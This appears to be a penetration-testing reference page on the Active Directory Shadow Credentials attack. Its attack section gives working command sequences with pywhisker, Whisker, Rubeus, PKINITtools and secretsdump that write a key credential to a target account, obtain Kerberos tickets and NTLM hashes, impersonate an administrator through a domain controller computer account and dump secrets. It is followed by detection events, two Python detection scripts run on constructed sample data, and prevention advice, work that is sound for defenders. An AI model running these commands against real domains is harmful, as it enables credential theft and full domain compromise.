Exploitation

Shadow Credentials

Exploit write access to the msDS-KeyCredentialLink attribute to add a key credential, enabling PKINIT authentication and obtaining NTLM hashes without knowing the password.

Information

Shadow Credentials requires: Domain functional level 2016+, PKINIT support, and write access to target's msDS-KeyCredentialLink attribute.

Tool Installation

pywhisker

Python shadow creds

pip install pywhisker

Whisker

C# shadow creds

github.com/eladshamir/Whisker

Certipy

PKINIT support

pip install certipy-ad

PKINITtools

PKINIT utilities

github.com/dirkjanm/PKINITtools

Attack Prerequisites

Requirements Check

  • ✅ Domain Functional Level 2016 or higher
  • ✅ At least one Domain Controller running Server 2016+
  • ✅ Write access to target's msDS-KeyCredentialLink attribute
  • ✅ Target account not protected by AdminSDHolder (or attack AdminSDHolder)
powershell
# Check domain functional level
Get-ADDomain | Select-Object DomainMode

# Check who has write access to msDS-KeyCredentialLink:
# GenericAll, GenericWrite, or WriteProperty scoped to that attribute (or to all properties).
# ObjectType shows which property a WriteProperty ACE applies to; AccessControlType separates Allow from Deny.
Get-ADObject -Identity "CN=Target,CN=Users,DC=corp,DC=local" -Properties nTSecurityDescriptor |
    Select-Object -ExpandProperty nTSecurityDescriptor |
    Select-Object -ExpandProperty Access |
    Where-Object { $_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty" } |
    Select-Object IdentityReference, ActiveDirectoryRights, ObjectType, AccessControlType

Adding Shadow Credentials

Using pywhisker (Linux)

bash
# Add shadow credentials to target user
python3 pywhisker.py -d corp.local -u attacker -p 'Password123' --target victimuser --action add

# This outputs:
# - A certificate PFX file
# - The password for the PFX
# - Command to use with gettgtpkinit.py

# Get TGT using PKINIT (prints the AS-REP encryption key needed below)
python3 gettgtpkinit.py corp.local/victimuser victimuser.ccache -cert-pfx victim.pfx -pfx-pass <password>

# Use the ticket
export KRB5CCNAME=victimuser.ccache

# Get NTLM hash via U2U
python3 getnthash.py corp.local/victimuser -key <AS-REP key from previous command>

Using Whisker (Windows)

powershell
# Add shadow credentials
Whisker.exe add /target:victimuser

# Output includes a ready-made Rubeus command
# Use Rubeus to get TGT and NTLM hash
Rubeus.exe asktgt /user:victimuser /certificate:<base64cert> /password:<password> /nowrap /ptt

# Alternative: get the hash directly (U2U)
Rubeus.exe asktgt /user:victimuser /certificate:<base64cert> /password:<password> /getcredentials

Targeting Computer Accounts

Shadow credentials on computer accounts allow privilege escalation through S4U2Self abuse.

bash
# Add shadow creds to computer account (need write access)
python3 pywhisker.py -d corp.local -u attacker -p 'Password123' --target 'DC01$' --action add

# Get TGT for computer
python3 gettgtpkinit.py corp.local/'DC01$' dc01.ccache -cert-pfx dc01.pfx -pfx-pass <password>

# S4U2Self to impersonate admin
# (single quotes keep the backslash in DOMAIN\account literal; unquoted, bash would strip it)
python3 gets4uticket.py 'kerberos+ccache://corp.local\DC01$:dc01.ccache@DC01.corp.local' cifs/DC01.corp.local@corp.local administrator@corp.local administrator.ccache

# Use ticket
export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass DC01.corp.local

Cleanup

bash
# List current shadow credentials
python3 pywhisker.py -d corp.local -u attacker -p 'Password123' --target victimuser --action list

# Remove specific device ID
python3 pywhisker.py -d corp.local -u attacker -p 'Password123' --target victimuser --action remove --device-id <DeviceID>

# Clear all shadow credentials
python3 pywhisker.py -d corp.local -u attacker -p 'Password123' --target victimuser --action clear

# Whisker cleanup (Windows)
Whisker.exe list /target:victimuser
Whisker.exe remove /target:victimuser /deviceid:<DeviceID>

🔍 Detection & Prevention

Blue Team Indicators

Detection Opportunities

  • Event 5136 - msDS-KeyCredentialLink attribute modified (requires Directory Service Changes auditing and a SACL on the object)
  • Event 4768 - Kerberos TGT request with certificate (the event's certificate fields are populated; pre-authentication type is PKINIT rather than a password)
  • Monitor for unexpected PKINIT authentication, especially for accounts that never used it before
  • Audit changes to high-value accounts
  • Look for certificate-based auth from unusual sources
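The two event IDs above become useful when they are correlated: a write to msDS-KeyCredentialLink by someone other than the object itself, followed shortly by a certificate-based TGT request for that same account, is the attack chain in the previous sections seen from the DC's side. The following is an added example (not code from the page, from pywhisker or from Whisker) that runs that correlation over constructed sample events; the field names mirror the EventData names of Windows events 5136 and 4768, and every value in the samples is made up. It treats a computer account writing its own link as benign (device registration and Windows Hello do that), which is an assumption you should tune to your environment.

```python
"""Correlate 5136 (msDS-KeyCredentialLink modified) with 4768 (TGT via certificate).

Added example with constructed sample events; not part of the original page.
"""
from datetime import datetime, timedelta, timezone

KEYCRED_ATTR = "msDS-KeyCredentialLink"
PA_PK_AS_REQ = "16"            # 4768 PreAuthType for PKINIT (password pre-auth is "2")
VALUE_ADDED = "%%14674"        # 5136 OperationType for "value added"

# Constructed sample events (not real logs). Names, IPs and thumbprint are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 5136, "TimeCreated": "2024-01-15T12:00:05Z", "SubjectUserName": "attacker",
     "ObjectDN": "CN=victimuser,CN=Users,DC=corp,DC=local",
     "AttributeLDAPDisplayName": KEYCRED_ATTR, "OperationType": VALUE_ADDED},
    {"EventID": 4768, "TimeCreated": "2024-01-15T12:01:10Z", "TargetUserName": "victimuser",
     "IpAddress": "10.10.14.5", "PreAuthType": PA_PK_AS_REQ, "CertThumbprint": "THUMBPRINT-PLACEHOLDER"},
    {"EventID": 4768, "TimeCreated": "2024-01-15T08:00:00Z", "TargetUserName": "alice",
     "IpAddress": "10.0.0.23", "PreAuthType": "2", "CertThumbprint": ""},
    {"EventID": 5136, "TimeCreated": "2024-01-15T09:00:00Z", "SubjectUserName": "WS01$",
     "ObjectDN": "CN=WS01,CN=Computers,DC=corp,DC=local",
     "AttributeLDAPDisplayName": KEYCRED_ATTR, "OperationType": VALUE_ADDED},
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def _cn(dn):
    # First RDN value of the DN: "CN=victimuser,CN=Users,..." -> "victimuser"
    return dn.split(",", 1)[0].split("=", 1)[1].strip().lower()


def keycred_writes(events):
    """5136 events touching msDS-KeyCredentialLink, with a self-write flag.

    A computer account writing its own link is expected (device registration,
    Windows Hello); any other writer deserves a ticket.
    """
    findings = []
    for e in events:
        if e.get("EventID") != 5136 or e.get("AttributeLDAPDisplayName") != KEYCRED_ATTR:
            continue
        target = _cn(e["ObjectDN"])
        writer = e["SubjectUserName"].rstrip("$").lower()
        findings.append({
            "time": _ts(e["TimeCreated"]), "target": target,
            "writer": e["SubjectUserName"], "self_write": writer == target,
            "operation": "added" if e.get("OperationType") == VALUE_ADDED else "removed",
        })
    return findings


def pkinit_logons(events):
    """4768 events where the TGT was obtained with a certificate (PKINIT)."""
    out = []
    for e in events:
        if e.get("EventID") != 4768:
            continue
        if e.get("PreAuthType") == PA_PK_AS_REQ or e.get("CertThumbprint"):
            out.append({"time": _ts(e["TimeCreated"]), "target": e["TargetUserName"].lower(),
                        "source_ip": e.get("IpAddress", ""), "thumbprint": e.get("CertThumbprint", "")})
    return out


def shadow_credential_alerts(events, window=timedelta(hours=1)):
    """Non-self writes to the attribute; 'critical' when the same account then
    authenticates with a certificate within `window`, 'high' otherwise."""
    alerts = []
    logons = pkinit_logons(events)
    for w in keycred_writes(events):
        if w["self_write"]:
            continue
        followed = [l for l in logons
                    if l["target"] == w["target"] and w["time"] <= l["time"] <= w["time"] + window]
        alerts.append({"target": w["target"], "writer": w["writer"],
                       "severity": "critical" if followed else "high",
                       "pkinit_sources": sorted({l["source_ip"] for l in followed})})
    return alerts


if __name__ == "__main__":
    for a in shadow_credential_alerts(SAMPLE_EVENTS):
        print(a)
```

The one-hour window and the self-write exemption are tuning knobs, not facts about the attack; a real deployment would also allowlist any provisioning identity that legitimately populates the attribute and would key the 4768 side on accounts with no prior PKINIT history.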

Prevention Measures

  • Audit write permissions on user/computer objects
  • Implement a tiered administration model
  • Monitor msDS-KeyCredentialLink changes
  • Regular audit of key credentials
  • Protected Users group for high-value accounts
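"Regular audit of key credentials" means reading the attribute back, not just watching for writes: msDS-KeyCredentialLink is a DN-Binary value whose blob (MS-ADTS KEYCREDENTIALLINK_BLOB, version 0x200, followed by length/identifier/value entries) carries a DeviceId and a KeyCreationTime, which is enough to spot a key that appeared after your last review. The following is an added example, not code from the page or from any of the tools it lists: it decodes that structure and reports credentials created after a review date or lacking a creation time. The sample values are constructed (placeholder KeyID bytes, a made-up DeviceId, no real key material), and the review-date rule is an assumed audit policy.

```python
"""Decode msDS-KeyCredentialLink values and flag key credentials created since the last review.

Added example on constructed sample data; not part of the original page.
"""
import struct
from datetime import datetime, timedelta, timezone
from uuid import UUID

# Entry identifiers from MS-ADTS 2.2.20.2 (KEYCREDENTIALLINK_ENTRY)
ENTRY_NAMES = {1: "KeyID", 2: "KeyHash", 3: "KeyMaterial", 4: "KeyUsage", 5: "KeySource",
               6: "DeviceId", 7: "CustomKeyInformation",
               8: "KeyApproximateLastLogonTimeStamp", 9: "KeyCreationTime"}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(raw):
    (ft,) = struct.unpack("<Q", raw)            # 100 ns ticks since 1601-01-01 UTC
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_keycredential_blob(blob):
    """Decode the binary part of a KeyCredentialLink value into a dict of entries."""
    (version,) = struct.unpack_from("<I", blob, 0)
    if version != 0x200:
        raise ValueError(f"unexpected KeyCredentialLink version 0x{version:x}")
    entries, off = {}, 4
    while off < len(blob):
        length, ident = struct.unpack_from("<HB", blob, off)
        off += 3
        value = blob[off:off + length]
        if len(value) != length:
            raise ValueError("truncated entry")
        off += length
        if ident == 6:
            value = str(UUID(bytes_le=value))        # DeviceId is a little-endian GUID
        elif ident in (8, 9):
            value = filetime_to_datetime(value)
        elif ident in (1, 2):
            value = value.hex()
        entries[ENTRY_NAMES.get(ident, f"Unknown-{ident}")] = value
    return entries


def parse_dn_binary(value):
    """DN-Binary syntax: 'B:<hex char count>:<hex>:<owner DN>'."""
    tag, hexlen, hexdata, dn = value.split(":", 3)
    if tag != "B" or int(hexlen) != len(hexdata):
        raise ValueError("malformed DN-Binary value")
    entry = parse_keycredential_blob(bytes.fromhex(hexdata))
    entry["DN"] = dn
    return entry


def audit_key_credentials(dn_binary_values, reviewed_at):
    """Assumed audit rule: report credentials created at/after the last review,
    and any with no creation time at all."""
    report = []
    for v in dn_binary_values:
        cred = parse_dn_binary(v)
        created = cred.get("KeyCreationTime")
        if created is None or created >= reviewed_at:
            report.append({"dn": cred["DN"], "device_id": cred.get("DeviceId"),
                           "key_id": cred.get("KeyID"), "created": created})
    return report


# ---- constructed sample data (no real keys; KeyID is placeholder bytes) ----
def _constructed_value(device_id, created, dn):
    def entry(ident, value):
        return struct.pack("<HB", len(value), ident) + value
    ticks = (created - FILETIME_EPOCH) // timedelta(microseconds=1) * 10
    blob = struct.pack("<I", 0x200) + entry(1, bytes(range(32)))
    blob += entry(6, UUID(device_id).bytes_le) + entry(9, struct.pack("<Q", ticks))
    return f"B:{len(blob.hex())}:{blob.hex()}:{dn}"


OWNER_DN = "CN=victimuser,CN=Users,DC=corp,DC=local"
OLD_DEVICE = "11111111-2222-3333-4444-555555555555"   # placeholder GUID
NEW_DEVICE = "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"   # placeholder GUID
SAMPLE_VALUES = [
    _constructed_value(OLD_DEVICE, datetime(2023, 6, 1, tzinfo=timezone.utc), OWNER_DN),
    _constructed_value(NEW_DEVICE, datetime(2024, 1, 15, 12, 0, tzinfo=timezone.utc), OWNER_DN),
]
REVIEWED_AT = datetime(2024, 1, 1, tzinfo=timezone.utc)


def run_audit():
    return audit_key_credentials(SAMPLE_VALUES, REVIEWED_AT)


if __name__ == "__main__":
    for finding in run_audit():
        print(finding)
```

In practice the input list is the multi-valued attribute as returned by an LDAP query for each account you care about; a DeviceId that matches no enrolled device in your MDM or Windows Hello inventory is the same signal the Cleanup section's `list` action would surface from the attacker's side.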

External Resources

Practice Labs

Practice Shadow Credentials attacks:

  • Support (Hack The Box, easy) - LDAP, Shadow Credentials
  • Absolute (Hack The Box, insane) - Shadow Credentials, RBCD